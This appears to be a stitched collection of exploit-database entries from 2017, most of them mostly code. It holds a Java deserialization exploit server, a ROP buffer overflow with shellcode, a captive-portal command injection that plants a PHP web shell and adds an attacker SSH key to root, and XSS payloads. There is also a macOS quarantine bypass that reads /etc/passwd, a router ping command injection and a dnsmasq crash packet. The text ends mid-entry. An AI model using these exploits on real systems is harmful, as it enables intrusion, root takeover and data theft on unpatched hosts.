# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitation:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicious serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self,req,client_addr,server):
SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)
def do_POST(self):
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x
70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x
72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(response))
self.end_headers()
self.wfile.write(response)
try:
httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
print "Serving at port: ", 3311
httpd.serve_forever()
except:
print "Exiting..."
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
#========================================================================================================================
import struct
buff = "a"*1312
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
f = open("shareName.txt","wb")
f.write(buff)
f.close()
# Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to the Ucopia guest wifi, every request is redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27
# Exploit Title: Multiple Stored XSS in EPESI
# Date: 10/03/2017
# Exploit Author: Zeeshan Shaikh
# Vendor Homepage: http://epe.si/
# Software Link: http://epe.si/download/
# Version: 1.8.2 rev20170830
# CVE : CVE-2017-14712 to CVE-2017-14717
# Category: webapps
XSS 1 (Tasks - Title)
Steps to recreate:
1. Home->Tasks->add new
2. Enter title as "MYTITLE" and fill required details but don't click save
3. Start interceptor and intercept request
4. click save
5. Now replace MYTITLE with "<i onclick=alert(1)>alertme</i>"(without
quotes)
6. Home->click on alertme
XSS 2 (Tasks - Description)
Steps to recreate:
1. Create a new task and fill description as "MYDESC" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYDESC with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 3 (Tasks/Phonecall - Notes - Title)
Steps to recreate:
1. Home->Tasks/PhoneCall->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in notes section
XSS 4 (Tasks - Alerts - Title)
Steps to recreate:
1. Home->Tasks->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in alerts section
XSS 5 (Phonecalls - Subject)
Steps to recreate:
1. Create a new phonecall and fill subject as "MYSUB" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYSUB with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 6 (Phonecalls - Description)
Same as XSS 5
Title: Mac OS X Local Javascript Quarantine Bypass
Product: Mac OS X
Version: 10.12, 10.11, 10.10 and probably prior
Vendor: apple.com <http://apple.com/>
Type: DOM Based XSS
Risk level: 3 / 5
Credits: filippo.cavallarin@wearesegment.com <mailto:filippo.cavallarin@wearesegment.com>
CVE: N/A
Vendor notification: 2017-07-15
Vendor fix: 2017-09-25
Public disclosure: 2017-09-28
DETAILS
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary
Javascript code without restrictions.
Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files
extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted
environment. For example, a quarantined html file won't be able to load local resources.
The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the
execution of arbitrary javascript commands in its (unrestricted) context.
The mentioned file is located at /System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
and contains the following code:
<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
[...]
rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
[...]
self.contentHttpReq.open('GET', rHTMLPath, true);
self.contentHttpReq.onreadystatechange = function() {
if (self.contentHttpReq.readyState == 4) {
loadTutorial(self.contentHttpReq.responseText);
}
}
[...]
}
function loadTutorial(response) {
var rHTMLPath = urlParam("rhtml");
// this will create a tutorialData item
eval(response);
[...]
}
function loadLocStrings()
{
var headID = document.getElementsByTagName("head")[0];
var rHTMLPath = urlParam("rhtml");
rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
newScript.src = rHTMLPath;
headID.appendChild(newScript);
}
[...]
</script>
In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates
the response content as javascript code.
The code above contains two different DOM Based XSS flaws.
The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as
its "src" property.
The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the
response directly to eval().
As the result the same payload is executed twice.
An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
One possible vector of exploitation is the .webloc file. Basically, such a file contains a url and simply loads
it in Safari when opened.
By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on
the victim's computer.
Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar
archive (or any other format that supports extended attributes).
PROOF OF CONCEPT
To reproduce the issue follow the steps below:
1. create a javascript file you want to execute on your target
2. convert its content to base64
3. encode it to a "uri component" (ex with encodeURIComponent js function)
4. use it to build a data uri as follow:
data:text/plain;base64,<urlencoded base64>
5. prepend the following string to it:
file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>
6. open it with Safari
7. save it as a bookmark
8. drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
9. create a tar archive containing the .webloc file
10. send it to the victim
Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the
javascript code must be: document.getElementsByTagName("base")[0].href="";
The following bash script will take a javascript file and converts it to final "file" url:
BOF
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>"
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
echo "usage: $0 <jsfile>"
exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
EOF
The following javascript code will alert the /etc/passwd file on the victim's computer:
BOF
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
alert(xhr.responseText);
}
};
xhr.send();
EOF
Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this
exploitation process it's not an issue since .webloc files are always opened with Safari.
NOTE
This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this
bug in Apple's changelog.
No CVE has been assigned by Apple.
SOLUTION
Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html.
Safari 11 (available for Mac OS X 10.11, 10.12 and 10.13) introduces the following security enhancement:
"CORS and cross origin access from file:// are now blocked unless Disable Local File Restrictions is selected from the Develop menu"
hence the above exploit will not work against updated versions of OSX El Capitan and Sierra. However javascript execution outside quarantine is still possible.
REFERENCES
https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html
DISCLOSURE
This vulnerability has been disclosed through the Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd
# Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION
# Date: 03.10.2017
# Exploit Author: Tauco
# Vendor Homepage: http://hk.fiberhomegroup.com
# Version: RP2609
# Tested on: Windows 10
Description:
===========================================================================
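Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. In the output below, the commands appended after the address in the ping_ip field are executed in addition to the ping, and they run as root (uid=0), which suggests the field is passed to a shell without validation.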
https://www.owasp.org/index.php/Command_Injection
Proof of Concepts :
=======================================
1. Go to the Default Gateway
2. Open the application
3. Open diagnosis
4. Input command to the Destination Address
5. Click Ping
ping_ip=127.0.0.1;whoami;id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.617 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.259 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.215 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.214 ms
64 bytes from 127.0.0.1: seq=4 ttl=64 time=0.218 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.214/0.304/0.617 ms
root
uid=0(root) gid=0 groups=0
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following options is specified: --add-mac, --add-cpe-id or --add-subnet.
=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = negative_size_param()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
